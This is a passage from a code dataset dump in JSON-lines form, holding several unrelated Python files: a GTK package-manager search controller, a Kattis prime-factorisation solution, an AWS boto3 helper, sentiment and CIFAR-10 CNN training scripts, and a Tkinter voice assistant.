matches:\n self._add_recent_search_safe(text)\n\n finally:\n self._service.repositories_lock.release()\n\n def _setup_search_view(self, items_count, text):\n \"\"\"\n Setup UI in order to show a \"not found\" message if required.\n \"\"\"\n nf_box = self._not_found_box\n if items_count or text is None:\n nf_box.set_property(\"expand\", False)\n nf_box.hide()\n self._view.get_parent().show()\n else:\n self._view.get_parent().hide()\n self._setup_not_found_box(text)\n nf_box.set_property(\"expand\", True)\n nf_box.show()\n\n def _setup_not_found_box(self, search_text):\n \"\"\"\n Setup \"not found\" message label and layout\n \"\"\"\n nf_box = self._not_found_box\n with self._entropy.rwsem().reader():\n # now self._not_found_label is available\n meant_packages = self._entropy.get_meant_packages(\n search_text)\n text = escape_markup(search_text)\n\n msg = \"%s %s\" % (\n escape_markup(_(\"Nothing found for\")),\n text,)\n if meant_packages:\n first_entry = meant_packages[0]\n app = Application(\n self._entropy, self._entropy_ws,\n self._service, first_entry)\n name = app.name\n\n msg += \", %s\" % (\n prepare_markup(_(\"did you mean %s?\")) % (\n escape_markup(name),\n escape_markup(name),),)\n\n self._not_found_label.set_markup(msg)\n\n def _on_not_found_label_activate_link(self, label, text):\n \"\"\"\n Handling the click event on of the\n \"not found\" search label. Just write the coming text\n to the Gtk.SearchEntry object.\n \"\"\"\n if text:\n self._search_entry.set_text(text)\n self._search(text)\n\n @property\n def _not_found_box(self):\n \"\"\"\n Return a Gtk.VBox containing the view that should\n be shown when no apps have been found (due to a search).\n \"\"\"\n if self._not_found_search_box is not None:\n return self._not_found_search_box\n # here we always have to access from the same thread\n # otherwise Gtk will go boom anyway\n box_align = Gtk.Alignment()\n box_align.set_padding(10, 10, 0, 0)\n box = Gtk.VBox()\n box_align.add(box)\n label = Gtk.Label(label=_(\"Not found\"))\n label.connect(\"activate-link\", self._on_not_found_label_activate_link)\n box.pack_start(label, True, True, 0)\n box_align.show()\n\n self._nf_box.pack_start(box_align, False, False, 0)\n self._nf_box.show_all()\n self._not_found_label = label\n self._not_found_search_box = box_align\n return box_align\n\n def _update_repositories(self):\n \"\"\"\n Spawn Repository Update on RigoDaemon\n \"\"\"\n self._service.update_repositories([], False)\n\n def _update_repositories_safe(self):\n \"\"\"\n Same as _update_repositories() but thread safe.\n \"\"\"\n GLib.idle_add(self._update_repositories)\n\n def _ensure_cache_dir(self):\n \"\"\"\n Make sure the cache directory is available.\n \"\"\"\n path = self.RECENT_SEARCHES_DIR\n try:\n os.makedirs(path)\n except OSError as err:\n if err.errno == errno.EEXIST:\n if os.path.isfile(path):\n os.remove(path) # fail, yeah\n return\n elif err.errno == errno.ENOTDIR:\n # wtf? we will fail later for sure\n return\n elif err.errno == errno.EPERM:\n # meh!\n return\n raise\n\n def _load_recent_searches(self):\n \"\"\"\n Load from disk a list() of recent searches.\n \"\"\"\n self._ensure_cache_dir()\n data = self._cacher.pop(\n self.RECENT_SEARCHES_CACHE_KEY,\n cache_dir=self.RECENT_SEARCHES_DIR)\n if data is None:\n return []\n return data[:self.RECENT_SEARCHES_MAX_LEN]\n\n def _store_recent_searches(self, searches):\n \"\"\"\n Store to disk a list of recent searches.\n \"\"\"\n self._ensure_cache_dir()\n self._cacher.save(\n self.RECENT_SEARCHES_CACHE_KEY,\n searches,\n cache_dir=self.RECENT_SEARCHES_DIR)\n\n def _store_searches_thread(self):\n \"\"\"\n Thread body doing recent searches writeback.\n \"\"\"\n data = {\n 'sem': Semaphore(0),\n 'res': None,\n }\n const_debug_write(\n __name__, \"running recent searches writeback\")\n\n def _get_list():\n searches = [x[0] for x in self._search_completion_model]\n data['res'] = searches\n data['sem'].release()\n GLib.idle_add(_get_list)\n\n data['sem'].acquire()\n searches = data['res']\n self._store_recent_searches(searches)\n self._search_writeback_thread = None\n const_debug_write(\n __name__, \"searches writeback complete\")\n\n def _add_recent_search_safe(self, search):\n \"\"\"\n Add text element to recent searches.\n \"\"\"\n if len(search) < self.MIN_RECENT_SEARCH_KEY_LEN:\n return\n\n if search not in self._search_completion_model_set:\n def _prepend():\n self._search_completion_model.prepend((search,))\n self._search_completion_model_set.add(search)\n GLib.idle_add(_prepend)\n\n with self._search_writeback_mutex:\n if self._search_writeback_thread is None:\n task = Timer(15.0, self._store_searches_thread)\n task.name = \"StoreRecentSearches\"\n task.daemon = True\n self._search_writeback_thread = task\n task.start()\n\n def _sort_key(self, package_match):\n \"\"\"\n Return the object used for sorting a list of package matches.\n \"\"\"\n return Application(\n self._entropy, self._entropy_ws,\n self._service, package_match).name\n\n def search(self, text):\n \"\"\"\n Execute an Application Search.\n \"\"\"\n self._search(text, _force=True)\n\n def setup(self):\n # load recent searches\n for search in self._load_recent_searches():\n self._search_completion_model.append([search])\n self._search_completion_model_set.add(search)\n\n # Not enabling because it doesn't work as intended\n # self._search_entry.set_completion(self._search_completion)\n\n pref = Preference(\n -1, _(\"Update repositories\"),\n _(\"Force the update of the available repositories.\"),\n \"view-refresh\", self._update_repositories)\n self._prefc.append(pref)\n\n def _update():\n self.emit(\"view-want-change\",\n RigoViewStates.STATIC_VIEW_STATE,\n None)\n self._service.configuration_updates()\n pref = Preference(\n 100, _(\"Show Configuration File Updates\"),\n _(\"Show (if any) the list of pending configuration file \"\n \"updates.\"),\n Icons.CONFIGURATION_FILE, _update)\n self._prefc.append(pref)\n\n def _show_installed():\n self._search(ApplicationsViewController.SHOW_INSTALLED_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Installed Applications\"),\n _(\"Browse through the currently Installed Applications.\"),\n \"drive-harddisk\", _show_installed)\n self._prefc.append(pref)\n\n def _optimize_mirrors():\n with self._entropy.rwsem().reader():\n repository_ids = self._entropy.repositories()\n self._service.optimize_mirrors(repository_ids)\n pref = Preference(\n 50, _(\"Optimize Download Speed\"),\n _(\"Benchmark the download mirrors to speed up Application\"\n \" installation.\"),\n \"browser-download\", _optimize_mirrors)\n self._prefc.append(pref)\n\n def _show_kernel_bins():\n self._search(ApplicationsViewController.SHOW_KERNEL_BINS_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Available Kernels\"),\n _(\"Browse through the available and installable Linux \"\n \"kernel binaries.\"),\n \"applications-development\", _show_kernel_bins)\n self._prefc.append(pref)\n\n def _show_kernel_lts_bins():\n self._search(ApplicationsViewController.SHOW_KERNEL_LTS_BINS_KEY,\n _force=True)\n pref = Preference(\n -2, _(\"Show Available Long-Term-Stable Kernels\"),\n _(\"Browse through the available and installable Linux \"\n \"LTS kernel binaries.\"),\n \"preferences-system\", _show_kernel_lts_bins)\n self._prefc.append(pref)\n\n def _show_queue_view(widget):\n self._search(ApplicationsViewController.SHOW_QUEUE_KEY,\n _force=True)\n self._bottom_nc.connect(\"show-queue-view\", _show_queue_view)\n def _clear(widget):\n self.clear()\n self._store.connect(\"all-vanished\", _clear)\n\n self._view.set_model(self._store)\n self._search_entry.connect(\n \"changed\", self._search_changed)\n self._search_entry.connect(\"icon-release\",\n self._search_icon_release)\n self._search_entry.connect(\"activate\",\n self._search_activate)\n self._view.show()\n\n def clear_silent(self):\n self._view.clear_model()\n ApplicationMetadata.discard()\n\n def deselect(self):\n \"\"\"\n Deselect currently selected Applications.\n \"\"\"\n self._view.clear_selection()\n\n def clear(self):\n self.clear_silent()\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-cleared\")\n self.emit(\"view-cleared\")\n\n def append(self, opaque):\n self._store.append([opaque])\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-filled\")\n self.emit(\"view-filled\")\n\n def append_many(self, opaque_list):\n for opaque in opaque_list:\n self._store.append([opaque])\n if const_debug_enabled():\n const_debug_write(__name__, \"AVC: emitting view-filled\")\n self.emit(\"view-filled\")\n\n def set_many(self, opaque_list, _from_search=None):\n self._view.clear_model()\n ApplicationMetadata.discard()\n self.append_many(opaque_list)\n self._setup_search_view(\n len(opaque_list), _from_search)\n\n def clear_safe(self):\n GLib.idle_add(self.clear)\n\n def clear_silent_safe(self):\n GLib.idle_add(self.clear_silent)\n\n def append_safe(self, opaque):\n GLib.idle_add(self.append, opaque)\n\n def append_many_safe(self, opaque_list):\n GLib.idle_add(self.append_many, opaque_list)\n\n def set_many_safe(self, opaque_list, _from_search=None):\n GLib.idle_add(self.set_many, opaque_list,\n _from_search)\n","repo_name":"Sabayon/entropy","sub_path":"rigo/rigo/ui/gtk3/controllers/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":30193,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"40"} +{"seq_id":"22166017808","text":"LIMIT = int(2**15.5 + 3)\r\nsieve = [True] * (LIMIT + 1)\r\nprimes = []\r\n\r\np = 2\r\nwhile p <= LIMIT:\r\n if sieve[p]:\r\n primes.append(p)\r\n for i in range(2*p, LIMIT, p):\r\n sieve[i] = False\r\n if p == 2:\r\n p -= 1\r\n p += 2\r\n\r\nrev = dict(map(reversed, enumerate(primes)))\r\n\r\ndef pf(n):\r\n res = {}\r\n idx = 0\r\n while n != 1 and idx < len(primes):\r\n if n % primes[idx] == 0:\r\n n //= primes[idx]\r\n res[primes[idx]] = res.get(primes[idx], 0) + 1\r\n else:\r\n idx += 1\r\n if n != 1:\r\n is_prime = True\r\n for p in range(primes[idx - 1], int(n**0.5) + 2):\r\n if n % p == 0:\r\n is_prime = False\r\n res[p] = 1\r\n if is_prime: res[n] = 1\r\n return res\r\n\r\nimport sys\r\nfor line in sys.stdin:\r\n x = int(line)\r\n r = 1\r\n for k, v in pf(x).items():\r\n r *= v**k\r\n print(x, r)","repo_name":"RussellDash332/kattis","sub_path":"src/Fundamental Neighbors/fundamentalneighbors.py","file_name":"fundamentalneighbors.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"39291354047","text":"import boto3\n\n\nclass Session:\n def __init__(self):\n self._user_session = boto3.session.Session()\n self.user_region = self._user_session.region_name\n\n\nclass Sts(Session):\n def __init__(self):\n Session.__init__(self)\n self._account_client = boto3.client(\"sts\")\n self.account_id = self._account_client.get_caller_identity()[\"Account\"]\n","repo_name":"u93/multa-metrics-collector","sub_path":"src/functions/handlers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25891355836","text":"import random\nprint('You live in a pretty messy world, this world is limited in supplies and in clean water. Your job is to deliver supplies to the next city.')\ntotalsupplies = 50 \ndelivered = random.randint(10,82)\ndayCount = 0 \ntrialnum = 0\nwhile trialnum < 10000 :\n totalsupplies = 50\n while totalsupplies < 1000000 :\n totalsupplies += delivered\n dayCount += 1\n trialnum += 1 \nprint('total supplies:', totalsupplies)\nprint('total days:', dayCount)\nprint('total trials:', trialnum) \nprint('Average number of days are :', dayCount/trialnum) \n","repo_name":"beanzbish/My-very-own-repository","sub_path":"project4.py","file_name":"project4.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6470118127","text":"import glob, csv, sys, os, re, json, nltk\nimport time, datetime\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, Conv1D, GlobalMaxPool1D, Dropout, Dense, Activation\nfrom keras.callbacks import CSVLogger\n\nPATH = \"data/sentiment_analysis/tweets/*.tsv\"\nPATH_SAVE = \"data/sentiment_analysis/tweets_predicted\"\ntest_date = \"2018-06-01\"\nval_date = \"2018-05-01\"\n\nstop_words = set(nltk.corpus.stopwords.words(\"english\"))\nps = nltk.stem.PorterStemmer()\n\n\nif sys.version_info[0] == 3:\n from urllib.request import urlopen\nelse:\n from urllib import urlopen\n\n\ndef get_currency_prices():\n\n # connect to poloniex's API\n CURRENCIES = ['USDT_BTC', 'USDT_LTC', 'USDT_ETH', 'USDT_XRP']\n url = 'https://poloniex.com/public?command=returnChartData¤cyPair=$C&start=1451602800&end=1530568800&period=86400'\n urls = [url.replace('$C', c) for c in CURRENCIES]\n\n for i, c in enumerate(CURRENCIES):\n with urlopen(urls[i]) as url:\n r = url.read()\n d = json.loads(r.decode())\n df = pd.DataFrame(d)\n df.to_pickle('data/sentiment_analysis/poloniex/' + c + '.pkl')\n print('Successfully downloaded', c)\n\n\ndef get_labels(training_data):\n\n btc_price_path = 'data/sentiment_analysis/poloniex/USDT_BTC.pkl'\n if not os.path.exists(btc_price_path):\n get_currency_prices()\n btc_df = pd.read_pickle(btc_price_path)\n btc_df_values = btc_df.values\n\n labels = []\n for data in training_data:\n\n index = np.where((btc_df_values[:,1]>=data[5]-23*60*60) & (btc_df_values[:,1] btc_df_values[index, 0]:\n coef = [(btc_df_values[index,0]/btc_df_values[index+1,0])[0], 1]\n elif btc_df_values[index+1,0] < btc_df_values[index, 0]:\n coef = [(btc_df_values[index+1,0]/ btc_df_values[index,0])[0], -1]\n\n labels = np.append(labels, coef).reshape(-1, 2)\n\n return labels\n\n\ndef make_dictionary(data):\n dict = {}\n i = 1\n for row in data:\n for word in row[1].split():\n if word not in dict.keys():\n dict[word] = i\n i += 1\n return dict\n\n\ndef make_bag_of_words(data, dict):\n bag_of_words = []\n for row in data:\n tweet_rep = np.zeros(shape=(30), dtype=np.int64)\n i = 0\n for word in row[1].split():\n ind = dict.get(word)\n tweet_rep[i] = ind if ind else 0\n i += 1\n if i==30:\n break\n bag_of_words = np.append(bag_of_words, tweet_rep).reshape(-1,30)\n\n return bag_of_words\n\n\ndef build_model(input_dim, output_dim, input_len):\n\n model = Sequential()\n model.add(Embedding(input_dim, output_dim, input_length=input_len))\n model.add(Conv1D(filters=250, kernel_size=5, padding='valid', activation='relu', strides=1))\n model.add(GlobalMaxPool1D())\n model.add(Dropout(0.5))\n model.add(Dense(2))\n model.add(Activation('sigmoid'))\n return model\n\n\ndef call_model(model, train_bag, train_labels, val_bag, val_labels):\n model.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n model.fit(train_bag, train_labels,\n batch_size=8,\n epochs=50,\n validation_data=(val_bag, val_labels),\n verbose=1,\n callbacks=[CSVLogger('nn_models/logger_sent.csv', append=True)])\n\n model.save('nn_models/sent.h5')\n\n\ndef cnn_process(train_data, val_data, test_data, train_labels, val_labels):\n\n dict = make_dictionary(train_data)\n\n train_bag = make_bag_of_words(train_data, dict)\n val_bag = make_bag_of_words(val_data, dict)\n test_bag = make_bag_of_words(test_data, dict)\n\n input_dim = (sorted(dict.values(), reverse=True))[0] + 1\n output_dim = 100\n input_len = len(train_bag[1, :])\n model = build_model(input_dim, output_dim, input_len)\n call_model(model, train_bag, train_labels, val_bag, val_labels)\n model.load_weights('nn_models/sent.h5')\n predicted = model.predict(test_bag)\n return predicted","repo_name":"kuzmanovicd/crypto-predictor","sub_path":"sent_cnn.py","file_name":"sent_cnn.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"36943479073","text":"from tensorflow.keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\ny_train = to_categorical(y_train, 10)\ny_test = to_categorical(y_test, 10)\ninput_shape = (32, 32, 3)\n\ndatagen = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\ndatagen.fit(x_train)\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization\n\ncnn = Sequential()\ncnn.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=input_shape))\ncnn.add(BatchNormalization())\n\ncnn.add(Conv2D(32, kernel_size=(3, 3), activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(MaxPooling2D(pool_size=(2, 2)))\ncnn.add(Dropout(0.25))\n\ncnn.add(Conv2D(64, kernel_size=(3,3), activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.25))\n\ncnn.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(MaxPooling2D(pool_size=(2, 2)))\ncnn.add(Dropout(0.25))\n\ncnn.add(Flatten())\n\ncnn.add(Dense(512, activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.5))\n\ncnn.add(Dense(128, activation='relu'))\ncnn.add(BatchNormalization())\ncnn.add(Dropout(0.5))\n\ncnn.add(Dense(10, activation='softmax'))\n\ncnn.compile(loss=tf.keras.losses.categorical_crossentropy,\n optimizer=tf.keras.optimizers.Adam(),\n metrics=['accuracy'])\n\nhistor = cnn.fit_generator(datagen.flow(x_train[:40000], y_train[:40000], batch_size=32),\n steps_per_epoch=len(x_train) / 32, \n epochs=50, \n validation_data=(x_train[40000:], y_train[40000:]))","repo_name":"richardwsnyder/CAP-5610","sub_path":"Program 2/convnetDataAugmentation.py","file_name":"convnetDataAugmentation.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25341907195","text":"import speech_recognition as sr\r\nimport pyttsx3 #converts speech to text \r\nimport pywhatkit\r\nimport datetime\r\nimport wikipedia\r\nimport pyjokes\r\nimport time \r\nimport webbrowser #To open websites\r\nimport os #To open files \r\nimport subprocess #To open files\r\nfrom tkinter import * #For the graphics \r\nfrom playsound import playsound #To play sounds\r\nimport keyboard \r\nimport winshell\r\nfrom urllib.request import urlopen\r\nimport requests\r\nimport json\r\nimport PyPDF2\r\n#from ecapture import ecapture as ec\r\n\r\n\r\n#name_assistant = \"Joonie\" #The name of the assistant\r\nname_file = open('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/Assistant_name.txt', \"r\")\r\nname_assistant = name_file.read() \r\n\r\n\r\nlistener = sr.Recognizer() #object creation of speech_recognition\r\nlistener.energy_threshold = 4000 #Values below this threshold are considered silence, and values above this threshold are considered speech. Can be changed.\r\nengine = pyttsx3.init() #object creation\r\n#voices = engine.getProperty('voices')\r\n#engine.setProperty('voice',voices[1].id)\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', 120) \r\n\r\ndef talk(text):\r\n engine.say(text)\r\n print(name_assistant + \" : \" + text)\r\n engine.runAndWait()\r\n\r\n#taking command from user and returning it\r\ndef take_command():\r\n try:\r\n with sr.Microphone() as source: #creating a microphone to record\r\n print('listening...')\r\n playsound('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_on.wav')\r\n voice = listener.listen(source,phrase_time_limit = 10)\r\n playsound('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_off.wav')\r\n print(\"Stop...\")\r\n command = listener.recognize_google(voice)\r\n print('You: ' + ': '+ command)\r\n if name_assistant in command:\r\n command = command.replace(name_assistant,\"\") #to remove the name of engine from our command\r\n #print(command)\r\n except Exception as e:\r\n print(e)\r\n #talk(\"Say that again sir\")\r\n #return \"None\"\r\n return command\r\n\r\n\r\ndef wishMe():\r\n hour=datetime.datetime.now().hour\r\n if hour >= 0 and hour < 12:\r\n talk(\"Hello,Good Morning I am you personal Assistant \"+name_assistant)\r\n elif hour >= 12 and hour < 18:\r\n talk(\"Hello,Good Afternoon I am you personal Assistant \"+name_assistant)\r\n else:\r\n talk(\"Hello,Good Evening I am you personal Assistant \"+name_assistant)\r\n\r\n\r\ndef note(text):\r\n date = datetime.datetime.now()\r\n file_name = str(date).replace(\":\", \"-\") + \"-note.txt\"\r\n with open(file_name, \"w\") as f:\r\n f.write(text)\r\n\r\n subprocess.Popen([\"notepad.exe\", file_name])\r\n\r\n\r\nwishMe()\r\n#executing the command\r\ndef run_alexa():\r\n run=1\r\n while run==1:\r\n command = take_command().lower()\r\n run+=1\r\n\r\n if \"hello\" or \"hi\" in command():\r\n wishMe()\r\n\r\n elif \"goodbye\" in command or \"okbye\" in command or \"stop\" in command:\r\n talk('Your personal assistant ' + name_assistant +' is shutting down, Good bye')\r\n screen.destroy()\r\n break\r\n\r\n elif 'date' in command:\r\n now = datetime.datetime.now()\r\n my_date = datetime.datetime.today()\r\n\r\n month_name = now.month\r\n day_name = now.day\r\n month_names = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\r\n ordinalnames = [ '1st', '2nd', '3rd', ' 4th', '5th', '6th', '7th', '8th', '9th', '10th', '11th', '12th', '13th', '14th', '15th', '16th', '17th', '18th', '19th', '20th', '21st', '22nd', '23rd','24rd', '25th', '26th', '27th', '28th', '29th', '30th', '31st'] \r\n \r\n\r\n talk(\"Today is \"+ month_names[month_name-1] +\" \" + ordinalnames[day_name-1] + '.')\r\n \r\n elif 'play' in command:\r\n song = command.replace('play',\"\")\r\n talk('playing'+song)\r\n pywhatkit.playonyt(song) #plays song on youtube\r\n time.sleep(5)\r\n\r\n elif 'time' in command:\r\n time = datetime.datetime.now().strftime('%I:%M %p') #getting the current time in stringformat(strftime)\r\n talk('Current time is ' + time)\r\n \r\n elif 'search' in command:\r\n try:\r\n person = command.replace(\"search\",\"\")\r\n info = wikipedia.summary(person,2) #fetching only 2 lines of info\r\n talk(info) #making the assistant to read\r\n #wikipedia_screen(info)\r\n except:\r\n talk(\"Error.. Couldn't find!\")\r\n \r\n elif 'joke' in command:\r\n talk(pyjokes.get_joke())\r\n\r\n elif 'cricket' in command:\r\n news1 = webbrowser.open_new_tab(\"cricbuzz.com\")\r\n talk('This is live news from cricbuzz')\r\n time.sleep(6)\r\n\r\n elif 'news' in command:\r\n news2 = webbrowser.open_new_tab(\"https://timesofindia.indiatimes.com\")\r\n talk('Here are some headlines from the Times of India, Happy reading')\r\n time.sleep(6)\r\n \r\n elif 'note this' or 'make a note' in command: \r\n command = command.replace(\"note this\", \"\")\r\n note(command)\r\n\r\n elif 'open google' in command:\r\n webbrowser.open_new_tab(\"https://www.google.com\")\r\n talk(\"Google chrome is open now\")\r\n time.sleep(5)\r\n\r\n elif 'empty recycle bin' in command:\r\n winshell.recycle_bin().empty(confirm = False, show_progress = False, sound = True)\r\n talk(\"Recycle Bin Recycled\")\r\n\r\n elif \"weather\" in command: \r\n # Google Open weather website\r\n # to get API of Open weather\r\n talk(\" City name \")\r\n print(\"City name : \")\r\n with sr.Microphone() as source: #creating a microphone to record\r\n new= sr.Recognizer()\r\n voice1 = new.listen(source,phrase_time_limit = 5)\r\n city_name = new.recognize_google(voice1)\r\n #city_name = take_command()\r\n api = \"https://api.openweathermap.org/data/2.5/weather?q=\"+city_name+\"&appid=98c178f21b28af823ffb9282fb68eca9\"\r\n json_data = requests.get(api).json()\r\n \r\n if json_data[\"cod\"] != \"404\":\r\n condition = json_data['weather'][0]['main'] #getting the weather json data\r\n temp = int(json_data['main']['temp'] - 273.15) \r\n min_temp = int(json_data['main']['temp_min'] - 273.15) \r\n max_temp = int(json_data['main']['temp_max'] - 273.15) \r\n pressure = json_data['main']['pressure']\r\n humidity = json_data['main']['humidity']\r\n wind = json_data['wind']['speed']\r\n \r\n final_info = condition+\" \"+ str(temp) +\" \"+ \"Degree celsius\"\r\n print(final_info)\r\n talk(\"The weather updates are\")\r\n talk(final_info)\r\n final_data = {\"Maximum Temperature\": max_temp, \"Minimum Temperature\":min_temp, \"Pressure\":+ pressure,\"Humidity\" : humidity, \"Wind Speed\":wind}\r\n print(final_data) \r\n for i in final_data:\r\n talk(i)\r\n talk(str(final_data[i]))\r\n \r\n else:\r\n talk(\" City Not Found \")\r\n talk(\"Repeat the command\")\r\n\r\n \r\n elif \"read the book\" in command:\r\n pdfFileObject = open('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/my_book.pdf', 'rb')\r\n pdfReader = PyPDF2.PdfFileReader(pdfFileObject)\r\n text=''\r\n for i in range(13,pdfReader.numPages):\r\n # creating a page object\r\n pageObj = pdfReader.getPage(i)\r\n # extracting text from page\r\n text=text+pageObj.extractText()\r\n print(text)\r\n talk(text)\r\n\r\n\r\n elif 'open gmail' in command:\r\n webbrowser.open_new_tab(\"mail.google.com\")\r\n talk(\"Google Mail open now\")\r\n time.sleep(5) \r\n\r\n elif 'who are you' in command or 'what can you do' in command:\r\n talk('I am '+name_assistant+' your personal assistant. I am programmed to minor tasks like opening youtube, google chrome, and search wikipedia etcetra') \r\n\r\n\r\n elif \"who made you\" in command or \"who created you\" in command or \"who discovered you\" in command:\r\n talk(\"I was built by my master Bhavna\")\r\n\r\n else:\r\n talk('please say the command again!')\r\n\r\n#while True:\r\n#run_alexa()\r\n #time.sleep(10)\r\n\r\ndef change_name():\r\n name_info = name.get()\r\n file=open(\"Assistant_name\", \"w\")\r\n file.write(name_info)\r\n file.close()\r\n settings_screen.destroy()\r\n #screen.destroy()\r\n\r\n\r\ndef change_name_window():\r\n global settings_screen\r\n global name\r\n\r\n\r\n settings_screen = Toplevel(screen)\r\n settings_screen.title(\"Settings\")\r\n settings_screen.geometry(\"300x300\")\r\n settings_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n \r\n name = StringVar()\r\n\r\n current_label = Label(settings_screen, text = \"Current name: \"+ name_assistant)\r\n current_label.pack()\r\n\r\n enter_label = Label(settings_screen, text = \"Please enter your Virtual Assistant's name below\") \r\n enter_label.pack(pady=10) \r\n \r\n\r\n Name_label = Label(settings_screen, text = \"Name\")\r\n Name_label.pack(pady=10)\r\n \r\n name_entry = Entry(settings_screen, textvariable = name)\r\n name_entry.pack()\r\n\r\n\r\n change_name_button = Button(settings_screen, text = \"Ok\", width = 10, height = 1, command = change_name)\r\n change_name_button.pack(pady=10)\r\n\r\n\r\ndef info():\r\n info_screen = Toplevel(screen)\r\n info_screen.title(\"Info\")\r\n info_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n creator_label = Label(info_screen,text = \"Created by Bhavna\")\r\n creator_label.pack()\r\n\r\n Age_label = Label(info_screen, text= \"She lives in Bhopal\")\r\n Age_label.pack()\r\n\r\n for_label = Label(info_screen, text = \"She likes AI!\")\r\n for_label.pack()\r\n\r\nkeyboard.add_hotkey(\"enter\", run_alexa)\r\n\r\ndef wikipedia_screen(text):\r\n wikipedia_screen = Toplevel(screen)\r\n wikipedia_screen.title(text)\r\n wikipedia_screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n message = Message(wikipedia_screen, text= text)\r\n message.pack()\r\n\r\ndef main_screen():\r\n global screen\r\n screen = Tk()\r\n screen.title(name_assistant)\r\n screen.geometry(\"300x400\")\r\n screen.iconbitmap('C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/app_icon.ico')\r\n\r\n\r\n name_label = Label(text = name_assistant,width = 300, bg = \"black\", fg=\"white\", font = (\"Calibri\", 13))\r\n name_label.pack()\r\n\r\n microphone_photo = PhotoImage(file = 'C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/assistant_logo.png')\r\n microphone_button = Button(image=microphone_photo, command = run_alexa)\r\n microphone_button.pack(pady=10)\r\n\r\n settings_photo = PhotoImage(file = 'C:/Users/DELL/OneDrive/Desktop/PYTHON/Virtual Assistant/settings.png')\r\n settings_button = Button(image=settings_photo, command = change_name_window)\r\n settings_button.pack(pady=10)\r\n \r\n info_button = Button(text =\"Info\", command = info)\r\n info_button.pack(pady=10)\r\n\r\n screen.mainloop()\r\nmain_screen()\r\n\r\n\r\n\r\n\r\n","repo_name":"ibhavna/Personal-Assistant","sub_path":"Virtual Assistant/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11518349583","text":"import json\nfrom BestNPCFinder import BestNPCFinder\n\nif __name__ == \"__main__\":\n npc_finder = BestNPCFinder('npcs.dat', 300, 1)\n\n best_exp_npcs = npc_finder.best_for_exp(20)\n best_gold_npcs = npc_finder.best_for_gold(3)\n best_total_npc = npc_finder.best_for_total(3)\n best_damage_npcs = npc_finder.best_for_damage(5)\n\n report = {\n 'best_exp_npcs': [npc.as_dict() for npc in best_exp_npcs],\n 'best_gold_npcs': [npc.as_dict() for npc in best_gold_npcs],\n 'best_total_npc': best_total_npc[0].as_dict(),\n 'best_damage_npcs': [npc.as_dict() for npc in best_damage_npcs],\n }\n\n report_json = json.dumps(report, indent=4)\n\n # Imprime el informe en formato JSON.\n print(report_json)\n\n # También puedes guardar el informe en un archivo\n with open('npc_report.json', 'w') as f:\n f.write(report_json)\n","repo_name":"maisonnat/pyBalance","sub_path":"game_helper.py","file_name":"game_helper.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71849807479","text":"#SFC project - CNN from scratch\n#Author: Jakub Svoboda \n#Date: 2019-10-26\n\n\nimport PyQt5\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import Qt, QPoint\nfrom PyQt5.QtWidgets import QMainWindow, QApplication\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QImage\nimport sys, os\nimport network\nimport numpy as np\nimport csv\n\nclass DrawArea(QLabel):\n\t#Encapsulates the display area widget and its functionality\n\tdef 